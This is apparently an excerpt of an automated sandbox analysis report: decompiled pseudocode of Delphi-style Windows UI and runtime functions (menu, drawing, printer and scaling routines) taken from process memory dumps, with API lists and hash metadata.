                                  				_pop(_t122);
                                  				 *[fs:eax] = _t122;
                                  				_push(0x4640b3);
                                  				return E00463E0C();
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                  • String ID: 4dB
                                  • API String ID: 862346643-1163926081
                                  • Opcode ID: 8f80d153e7aa81b56968d1b96ef09e346944e40b7c1c645c770cb4ad0a6257c5
                                  • Instruction ID: 725272d2471761a726112e911ae94c7e852222784f40e3636587b23b8a63c46d
                                  • Opcode Fuzzy Hash: 8f80d153e7aa81b56968d1b96ef09e346944e40b7c1c645c770cb4ad0a6257c5
                                  • Instruction Fuzzy Hash: 1C514130A04244EFDB00EF65D986B9D77F1EB49704F1140BAF804AB3A2E779AE40DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044B39C(void* __eax, struct HDC__* __ecx, struct HDC__* __edx) {
                                  				struct tagRECT _v44;
                                  				struct tagRECT _v60;
                                  				void* _v68;
                                  				int _v80;
                                  				void* __ebx;
                                  				int _t79;
                                  				struct HDC__* _t134;
                                  				int _t135;
                                  				void* _t136;
                                  				void* _t155;
                                  				void* _t156;
                                  				void* _t157;
                                  				struct HDC__* _t158;
                                  				intOrPtr* _t159;
                                  
                                  				_t137 = __ecx;
                                  				_t159 =  &(_v44.bottom);
                                  				_t134 = __ecx;
                                  				_t158 = __edx;
                                  				_t157 = __eax;
                                  				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *(__eax + 0x17c) != 0) {
                                  					_t137 =  *( *(__eax + 0x17c));
                                  					 *((intOrPtr*)( *( *(__eax + 0x17c)) + 0x20))();
                                  				}
                                  				_t78 =  *((intOrPtr*)(_t157 + 0x198));
                                  				if( *((intOrPtr*)(_t157 + 0x198)) == 0) {
                                  					L17:
                                  					_t79 =  *(_t157 + 0x19c);
                                  					if(_t79 == 0) {
                                  						L27:
                                  						return _t79;
                                  					}
                                  					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                                  					if(_t79 < 0) {
                                  						goto L27;
                                  					}
                                  					_v44.right = _t79 + 1;
                                  					_t155 = 0;
                                  					do {
                                  						_t79 = E0041C834( *(_t157 + 0x19c), _t137, _t155);
                                  						_t135 = _t79;
                                  						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                                  							_v44.left = CreateSolidBrush(E00427FD0(0xff000010));
                                  							E0041B1E4( *((intOrPtr*)(_t135 + 0x40)) - 1, _t135,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                                  							FrameRect(_t158,  &_v44, _v44);
                                  							DeleteObject(_v60.right);
                                  							_v60.left = CreateSolidBrush(E00427FD0(0xff000014));
                                  							_t137 =  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1;
                                  							E0041B1E4( *((intOrPtr*)(_t135 + 0x40)), _t135,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                                  							FrameRect(_t158,  &_v60, _v60);
                                  							_t79 = DeleteObject(_v68);
                                  						}
                                  						_t155 = _t155 + 1;
                                  						_t75 =  &(_v44.right);
                                  						 *_t75 = _v44.right - 1;
                                  					} while ( *_t75 != 0);
                                  					goto L27;
                                  				}
                                  				_t156 = 0;
                                  				if(_t134 != 0) {
                                  					_t156 = E0041C898(_t78, _t134);
                                  					if(_t156 < 0) {
                                  						_t156 = 0;
                                  					}
                                  				}
                                  				 *_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x198)) + 8));
                                  				if(_t156 <  *_t159) {
                                  					do {
                                  						_t136 = E0041C834( *((intOrPtr*)(_t157 + 0x198)), _t137, _t156);
                                  						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                                  							_t137 =  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48);
                                  							E0041B1E4( *((intOrPtr*)(_t136 + 0x40)), _t136,  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                                  							if(RectVisible(_t158,  &(_v44.top)) != 0) {
                                  								if(( *(_t157 + 0x54) & 0x00000080) != 0) {
                                  									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                                  								}
                                  								_v60.top = SaveDC(_t158);
                                  								E00445658(_t158,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                                  								IntersectClipRect(_t158, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                                  								_t137 = _t158;
                                  								E00447F3C(_t136, _t158, 0xf, 0);
                                  								RestoreDC(_t158, _v80);
                                  								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                                  							}
                                  						}
                                  						_t156 = _t156 + 1;
                                  					} while (_t156 < _v60.top);
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                  • String ID:
                                  • API String ID: 375863564-0
                                  • Opcode ID: fc0d3cf62b4218cbaeb29ed0b1e9ada9aae2207197caed0427c3551be30eee1d
                                  • Instruction ID: 797e2c0992912d0dc49b3ed57930f92ad52e54312dd34cfde094d9f6f196728d
                                  • Opcode Fuzzy Hash: fc0d3cf62b4218cbaeb29ed0b1e9ada9aae2207197caed0427c3551be30eee1d
                                  • Instruction Fuzzy Hash: C7512C716042449BEB14EF29C8C4B5B77E8EF44308F04445AFE898B387D739E845CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00462BA0(intOrPtr _a4) {
                                  				intOrPtr _t27;
                                  				struct HMENU__* _t48;
                                  
                                  				_t27 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((char*)(_t27 + 0x229)) != 0) {
                                  					_t27 =  *((intOrPtr*)(_a4 - 4));
                                  					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
                                  						_t27 =  *((intOrPtr*)(_a4 - 4));
                                  						if( *((char*)(_t27 + 0x22f)) != 1) {
                                  							_t48 = GetSystemMenu(E0044D590( *((intOrPtr*)(_a4 - 4))), 0);
                                  							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
                                  								DeleteMenu(_t48, 0xf130, 0);
                                  								DeleteMenu(_t48, 7, 0x400);
                                  								DeleteMenu(_t48, 5, 0x400);
                                  								DeleteMenu(_t48, 0xf030, 0);
                                  								DeleteMenu(_t48, 0xf020, 0);
                                  								DeleteMenu(_t48, 0xf000, 0);
                                  								return DeleteMenu(_t48, 0xf120, 0);
                                  							}
                                  							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
                                  								EnableMenuItem(_t48, 0xf020, 1);
                                  							}
                                  							_t27 =  *((intOrPtr*)(_a4 - 4));
                                  							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
                                  								return EnableMenuItem(_t48, 0xf030, 1);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t27;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Menu$Delete$EnableItem$System
                                  • String ID:
                                  • API String ID: 3985193851-0
                                  • Opcode ID: 0f6c5d92ee3942f3d5e753c1dcc28b2c400ade31a1fce24b9a1ac2a23ffba28a
                                  • Instruction ID: 7dee2eb7f943a56462953984972c5910efd220d56ade7dd9b377c937f44dfc5c
                                  • Opcode Fuzzy Hash: 0f6c5d92ee3942f3d5e753c1dcc28b2c400ade31a1fce24b9a1ac2a23ffba28a
                                  • Instruction Fuzzy Hash: 70215EB0B847407AE730AA64CE8EF597BD85B04B18F1454A5B6087F2D3D6FCF980865E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E004322E0(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr* _v28;
                                  				char _v1052;
                                  				char _v1056;
                                  				char _v1060;
                                  				char _v1064;
                                  				char* _t44;
                                  				void* _t69;
                                  				void* _t70;
                                  				void* _t78;
                                  				long _t88;
                                  				intOrPtr _t90;
                                  				void* _t95;
                                  				void* _t97;
                                  				void* _t102;
                                  				intOrPtr _t107;
                                  				intOrPtr _t113;
                                  				intOrPtr* _t116;
                                  				void* _t119;
                                  				void* _t120;
                                  				void* _t122;
                                  				void* _t123;
                                  				intOrPtr _t124;
                                  
                                  				_t117 = __esi;
                                  				_t115 = __edi;
                                  				_t97 = __ecx;
                                  				_t94 = __ebx;
                                  				_t122 = _t123;
                                  				_t124 = _t123 + 0xfffffbdc;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t105 = 0;
                                  				_v1064 = 0;
                                  				_v1060 = 0;
                                  				_v1056 = 0;
                                  				_v8 = __eax;
                                  				_push(_t122);
                                  				_push(0x4324bd);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t124;
                                  				_v12 = 0;
                                  				_v16 = 0;
                                  				_push( &_v16);
                                  				_t44 =  &_v12;
                                  				_push(_t44);
                                  				_push(0);
                                  				_push(0);
                                  				_push(5);
                                  				_push(0);
                                  				_push(1);
                                  				L0043158C();
                                  				if(_t44 == 0 && GetLastError() != 0x7a) {
                                  					_t88 = GetLastError();
                                  					_t127 = _t88 - 0x7b;
                                  					if(_t88 != 0x7b) {
                                  						E0040E138(__ebx, _t97, __edi, __esi);
                                  					} else {
                                  						_t105 =  &_v1056;
                                  						_t90 =  *0x4badc4; // 0x426634
                                  						E0040656C(_t90, _t97,  &_v1056);
                                  						E004316E4(_v1056);
                                  					}
                                  				}
                                  				_v28 = E004087C4(_v12, _t97, _t105, _t127);
                                  				_push(_t122);
                                  				_push(0x43247d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t124;
                                  				_push( &_v16);
                                  				_push( &_v12);
                                  				_push(_v12);
                                  				_push(_v28);
                                  				_push(5);
                                  				_push(0);
                                  				_push(1);
                                  				L0043158C();
                                  				if(_v16 <= 0) {
                                  					GetProfileStringA("windows", "device", 0x4324cc,  &_v1052, 0x3ff);
                                  					_v20 =  &_v1052;
                                  					_v24 = E00431694( &_v20);
                                  				} else {
                                  					_v24 =  *_v28;
                                  				}
                                  				_t116 = E00432090(_v8, _t94, _t115, _t117);
                                  				_t119 =  *((intOrPtr*)( *_t116 + 0x14))() - 1;
                                  				if(_t119 < 0) {
                                  					L13:
                                  					__eflags = 0;
                                  					_pop(_t107);
                                  					 *[fs:eax] = _t107;
                                  					_push(0x432484);
                                  					return E00402B14(_v28);
                                  				} else {
                                  					_t120 = _t119 + 1;
                                  					_t95 = 0;
                                  					while(1) {
                                  						_push( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x18))() + 8)));
                                  						E004045D0( &_v1060, _v24);
                                  						_pop(_t69);
                                  						_t70 = E00408A98(_t69, _v1060, 0);
                                  						_t131 = _t70;
                                  						if(_t70 != 0) {
                                  							break;
                                  						}
                                  						_t95 = _t95 + 1;
                                  						_t120 = _t120 - 1;
                                  						__eflags = _t120;
                                  						if(_t120 != 0) {
                                  							continue;
                                  						} else {
                                  							goto L13;
                                  						}
                                  						goto L15;
                                  					}
                                  					_t96 =  *((intOrPtr*)( *_t116 + 0x18))();
                                  					_push(E00404898( *((intOrPtr*)(_t72 + 0xc))));
                                  					_push(E00404898( *((intOrPtr*)(_t72 + 4))));
                                  					_t78 = E00404898( *((intOrPtr*)(_t96 + 8)));
                                  					_pop(_t102);
                                  					E00431DB8(_v8, _t96, _t102, _t78, _t116, _t120, _t131);
                                  					E00403E98();
                                  					_t113 = 0;
                                  					 *[fs:eax] = _t113;
                                  					_push(0x4324c4);
                                  					return E004043FC( &_v1064, 3);
                                  				}
                                  				L15:
                                  			}































                                  APIs
                                  • 738D6BB0.WINSPOOL.DRV(00000001,00000000,00000005,00000000,00000000,?,?,00000000,004324BD,?,00000000,?,?,?,00432088), ref: 0043232D
                                  • GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,004324BD,?,00000000,?,?,?,00432088), ref: 00432336
                                  • GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,004324BD,?,00000000,?,?,?,00432088), ref: 00432340
                                    • Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E
                                  • 738D6BB0.WINSPOOL.DRV(00000001,00000000,00000005,00000000,?,?,?,00000000,0043247D,?,00000001,00000000,00000005,00000000,00000000,?), ref: 0043239B
                                  • GetProfileStringA.KERNEL32 ref: 004323CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ErrorLastString$LoadProfile
                                  • String ID: 4fB$device$windows
                                  • API String ID: 1759087498-691026950
                                  • Opcode ID: f3e36942b3d9d325df4fe242789fb00a18c4875a1eb19c7da6558f3b05a1f550
                                  • Instruction ID: f2ac634cdbc52cec3087abfacf078a93b855a289682706199ff95e3f370f64ea
                                  • Opcode Fuzzy Hash: f3e36942b3d9d325df4fe242789fb00a18c4875a1eb19c7da6558f3b05a1f550
                                  • Instruction Fuzzy Hash: 0A5143B1A00208AFD710EFA5CD81B9EB7F8EF48704F5144BBF505E7291D6789E418B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C9D8(void* __edx, void* __edi, void* __fp0) {
                                  				void _v1024;
                                  				char _v1088;
                                  				long _v1092;
                                  				void* _t12;
                                  				char* _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t24;
                                  				long _t32;
                                  
                                  				_t40 = __edx;
                                  				E0040C840(_t12,  &_v1024, __edx, __fp0, 0x400);
                                  				_t14 =  *0x4bb0d8; // 0x4bc04c
                                  				if( *_t14 == 0) {
                                  					_t16 =  *0x4badb0; // 0x4078ec
                                  					_t9 = _t16 + 4; // 0xffd1
                                  					_t18 =  *0x4bc668; // 0x400000
                                  					LoadStringA(E00405A30(_t18,  &_v1024, _t40),  *_t9,  &_v1088, 0x40);
                                  					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                  				}
                                  				_t24 =  *0x4bae1c; // 0x4bc21c
                                  				E00402C70(E00402E00(_t24));
                                  				CharToOemA( &_v1024,  &_v1024);
                                  				_t32 = E0040946C( &_v1024, __edi);
                                  				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                  				return WriteFile(GetStdHandle(0xfffffff4), 0x40ca9c, 2,  &_v1092, 0);
                                  			}


                                  APIs
                                    • Part of subcall function 0040C840: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C85C
                                    • Part of subcall function 0040C840: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C880
                                    • Part of subcall function 0040C840: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C89B
                                    • Part of subcall function 0040C840: LoadStringA.USER32 ref: 0040C93F
                                  • CharToOemA.USER32 ref: 0040CA0F
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040CA2C
                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040CA32
                                  • GetStdHandle.KERNEL32(000000F4,0040CA9C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CA47
                                  • WriteFile.KERNEL32(00000000,000000F4,0040CA9C,00000002,?), ref: 0040CA4D
                                  • LoadStringA.USER32 ref: 0040CA6F
                                  • MessageBoxA.USER32 ref: 0040CA85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                  • String ID: x@
                                  • API String ID: 185507032-1963665138
                                  • Opcode ID: 32963e8ee662bd11d50197303082abe9d9462009d9c906d7f3f530e3eb4146fe
                                  • Instruction ID: a46017b86ceaa44181fc0619728259f2fb014beabb00898478d2c3dca9ed91ff
                                  • Opcode Fuzzy Hash: 32963e8ee662bd11d50197303082abe9d9462009d9c906d7f3f530e3eb4146fe
                                  • Instruction Fuzzy Hash: F31151B1108204AFD700F7A5CC86F9B77ECAB44704F40463BB755F60E2DA78E9548B6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0043BBE0(intOrPtr* __eax, void* __ecx) {
                                  				intOrPtr _v8;
                                  				struct tagRECT _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				void* __edi;
                                  				void* __ebp;
                                  				void* _t85;
                                  				intOrPtr* _t150;
                                  				void* _t152;
                                  				void* _t158;
                                  				intOrPtr _t165;
                                  				void* _t181;
                                  				signed int _t183;
                                  				void* _t186;
                                  				void* _t188;
                                  				void* _t190;
                                  				intOrPtr _t191;
                                  
                                  				_t152 = __ecx;
                                  				_t188 = _t190;
                                  				_t191 = _t190 + 0xffffffdc;
                                  				_push(_t181);
                                  				_t150 = __eax;
                                  				_t85 = E0044B720(__eax, _t158);
                                  				_t193 =  *((char*)(_t150 + 0x165));
                                  				if( *((char*)(_t150 + 0x165)) == 0) {
                                  					return _t85;
                                  				} else {
                                  					_v8 = E00428DB4(_t152, 1);
                                  					 *[fs:eax] = _t191;
                                  					E004458F8(_v8, _t150);
                                  					 *((intOrPtr*)( *_t150 + 0x44))( *[fs:eax], 0x43be09, _t188);
                                  					E00428C64( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t193);
                                  					E00429044(_v8,  &_v24);
                                  					InflateRect( &_v24, 0xffffffff, 0xffffffff);
                                  					E00429044(_v8,  &_v24);
                                  					if( *((char*)(_t150 + 0x165)) != 0) {
                                  						_t186 = 0;
                                  						if( *((char*)(_t150 + 0x163)) != 0) {
                                  							_t186 = 0 +  *((intOrPtr*)(_t150 + 0x168));
                                  						}
                                  						if( *((char*)(_t150 + 0x164)) != 0) {
                                  							_t186 = _t186 +  *((intOrPtr*)(_t150 + 0x168));
                                  						}
                                  						_t199 = _t186;
                                  						if(_t186 == 0) {
                                  							 *((intOrPtr*)( *_t150 + 0x44))();
                                  							E00428C64( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t199);
                                  							E00429044(_v8,  &_v24);
                                  							InflateRect( &_v24, 0xffffffff, 0xffffffff);
                                  							E00429044(_v8,  &_v24);
                                  						}
                                  						 *((intOrPtr*)( *_t150 + 0x44))();
                                  						E004466E4(_t150,  &_v40);
                                  						_t183 = GetWindowLongA(E004294DC(_v8), 0xfffffff0);
                                  						if(( *(_t150 + 0x162) & 0x00000001) != 0) {
                                  							_v40 = _v40 - _t186;
                                  						}
                                  						if(( *(_t150 + 0x162) & 0x00000002) != 0) {
                                  							_v36 = _v36 - _t186;
                                  						}
                                  						if(( *(_t150 + 0x162) & 0x00000004) != 0) {
                                  							_v32 = _v32 + _t186;
                                  						}
                                  						if((_t183 & 0x00200000) != 0) {
                                  							_v32 = _v32 + GetSystemMetrics(0x14);
                                  						}
                                  						if(( *(_t150 + 0x162) & 0x00000008) != 0) {
                                  							_v28 = _v28 + _t186;
                                  						}
                                  						if((_t183 & 0x00100000) != 0) {
                                  							_v28 = _v28 + GetSystemMetrics(0x15);
                                  						}
                                  						DrawEdge(E004294DC(_v8),  &_v24,  *0x004A0A18 |  *0x004A0A28,  *0x004A0A38 |  *0x004A0A48 | 0x00002000);
                                  						_v24.left = _v24.right - GetSystemMetrics(0xa) - 1;
                                  						if(E0043A38C(_t150) == 0) {
                                  							DrawFrameControl(E004294DC(_v8),  &_v24, 3, 0x4005);
                                  						} else {
                                  							DrawFrameControl(E004294DC(_v8),  &_v24, 3, 0x4005);
                                  						}
                                  					}
                                  					_pop(_t165);
                                  					 *[fs:eax] = _t165;
                                  					_push(0x43be10);
                                  					return E0040360C(_v8);
                                  				}
                                  			}


                                  APIs
                                    • Part of subcall function 00428DB4: RtlInitializeCriticalSection.KERNEL32(0042C510,0042C4D8,?,00000001,0042C66E,?,?,?,0042D8E1,?,?,0042D700,?,0000000E,00000000,?), ref: 00428DD4
                                    • Part of subcall function 00429044: FrameRect.USER32 ref: 0042906C
                                  • InflateRect.USER32 ref: 0043BC51
                                  • InflateRect.USER32 ref: 0043BCBD
                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0043BCEC
                                  • GetSystemMetrics.USER32 ref: 0043BD21
                                  • GetSystemMetrics.USER32 ref: 0043BD3F
                                  • DrawEdge.USER32(00000000,?,00000000,00000008), ref: 0043BD9F
                                  • GetSystemMetrics.USER32 ref: 0043BDA6
                                  • DrawFrameControl.USER32(00000000,?,00000003,00004005), ref: 0043BDD3
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: MetricsRectSystem$DrawFrameInflate$ControlCriticalEdgeInitializeLongSectionWindow
                                  • String ID:
                                  • API String ID: 1475008941-0
                                  • Opcode ID: 0eb8a9d6ce3d9c223dec1813268cea28a7c3de0a8fadcb6eb727b17a92a48758
                                  • Instruction ID: f670bfb040df1e25cdc4aca23a88a12db15828097874a01926c31e2443e94ba3
                                  • Opcode Fuzzy Hash: 0eb8a9d6ce3d9c223dec1813268cea28a7c3de0a8fadcb6eb727b17a92a48758
                                  • Instruction Fuzzy Hash: EE61E730A042449BDB00EF69CD86BDF77F5EF49304F1401BAB904AB296D7389E05CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00446960(intOrPtr* __eax, int __ecx, int __edx) {
                                  				char _t62;
                                  				signed int _t64;
                                  				signed int _t65;
                                  				signed char _t107;
                                  				intOrPtr _t113;
                                  				intOrPtr _t114;
                                  				int _t117;
                                  				intOrPtr* _t118;
                                  				int _t119;
                                  				int* _t121;
                                  
                                  				 *_t121 = __ecx;
                                  				_t117 = __edx;
                                  				_t118 = __eax;
                                  				if(__edx ==  *_t121) {
                                  					L29:
                                  					_t62 =  *0x446b0c; // 0x0
                                  					 *((char*)(_t118 + 0x98)) = _t62;
                                  					return _t62;
                                  				}
                                  				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                  					_t107 =  *0x446b04; // 0x1f
                                  				} else {
                                  					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                  				}
                                  				if((_t107 & 0x00000001) == 0) {
                                  					_t119 =  *(_t118 + 0x40);
                                  				} else {
                                  					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                  				}
                                  				if((_t107 & 0x00000002) == 0) {
                                  					_t121[1] =  *(_t118 + 0x44);
                                  				} else {
                                  					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                  				}
                                  				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                  					_t64 =  *(_t118 + 0x48);
                                  					_t121[2] = _t64;
                                  				} else {
                                  					if((_t107 & 0x00000001) == 0) {
                                  						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                  						_t121[2] = _t64;
                                  					} else {
                                  						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                  						_t121[2] = _t64;
                                  					}
                                  				}
                                  				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                  				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                  					_t121[3] =  *(_t118 + 0x4c);
                                  				} else {
                                  					if(_t65 == 0) {
                                  						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                  					} else {
                                  						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                  					}
                                  				}
                                  				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                  				_t113 =  *0x446b0c; // 0x0
                                  				if(_t113 != (_t107 &  *0x446b08)) {
                                  					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                  				}
                                  				_t114 =  *0x446b0c; // 0x0
                                  				if(_t114 != (_t107 &  *0x446b10)) {
                                  					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                  				}
                                  				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                  					E00428730( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00428714( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                  				}
                                  				goto L29;
                                  			}


                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
